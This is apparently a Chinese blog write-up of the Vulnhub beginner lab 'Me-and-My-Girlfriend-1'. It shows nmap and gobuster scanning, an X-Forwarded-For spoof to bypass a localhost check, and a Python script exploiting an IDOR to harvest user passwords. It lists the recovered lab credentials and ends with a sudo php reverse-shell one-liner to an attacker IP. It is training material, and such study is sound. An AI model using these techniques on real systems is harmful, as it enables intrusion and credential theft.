【Vulnhub】靶机Me-and-My-Girlfriend-1

前言

  • Vulnhub刷题简单记录

Me-and-My-Girlfriend-1

描述

描述:这个虚拟机告诉我们有一对恋人,爱丽丝和鲍勃,这对夫妇原本非常浪漫,但自从爱丽丝在一家私人公司“Ceban Corp”工作后,爱丽丝对鲍勃的态度发生了一些变化是“隐藏的”,Bob 请求您帮助获取 Alice 隐藏的内容并获得对公司的完全访问权限!

难度级别:初学者

注意:有 2 个标志文件

学习:Web 应用程序 | 简单的提权

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

Me-and-My-Girlfriend-1开始

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
nmap -sV -sC -A 192.168.1.108

3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况

1
2
3
gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200

dirb http://192.168.1.104/

4、进入主页,发下必须改x-forwarded-for为本地地址,所以下个插件改为127.0.0.1来访问

image-20210925154409342

5、注册之后,发现有平行越权获取用户的账号和密码,写个脚本跑一波

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# coding:utf-8
import re
import requests

def get_UserInfo(id):
cookies = {
"PHPSESSID":"ve33ic8l6hhrn6004ul1binas3"
}
headers = {
"X-Forwarded-For": "127.0.0.1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
}
res = requests.get("http://192.168.56.104/index.php?page=profile&user_id={}".format(id),headers=headers,cookies=cookies).text

name = re.search("name\" value=\"(.*?)\">",res).group(1)
username = re.search("rname\" value=\"(.*?)\">",res).group(1)
password = re.search("word\" value=\"(.*?)\">",res).group(1)
return name,username,password
for i in range(1,20):
name,username,password = get_UserInfo(i)
if name:
print(username+":"+password)

获取了密码

6、经典的爆破密码

image-20210925155049538

1
2
3
4
5
6
7
eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
gylq:gylq

7、登陆,拿flag

image-20210925155324774

8、简单提权

1
sudo -l发现php是可以无密码使用root权限

反弹root权限

1
sudo /usr/bin/php -r '$sock=fsockopen("192.168.56.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");

image-20210925160619686

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【Vulnhub】靶机Me-and-My-Girlfriend-1

文章作者:孤桜懶契

发布时间:2021年09月25日 - 13:37:28

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/150.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------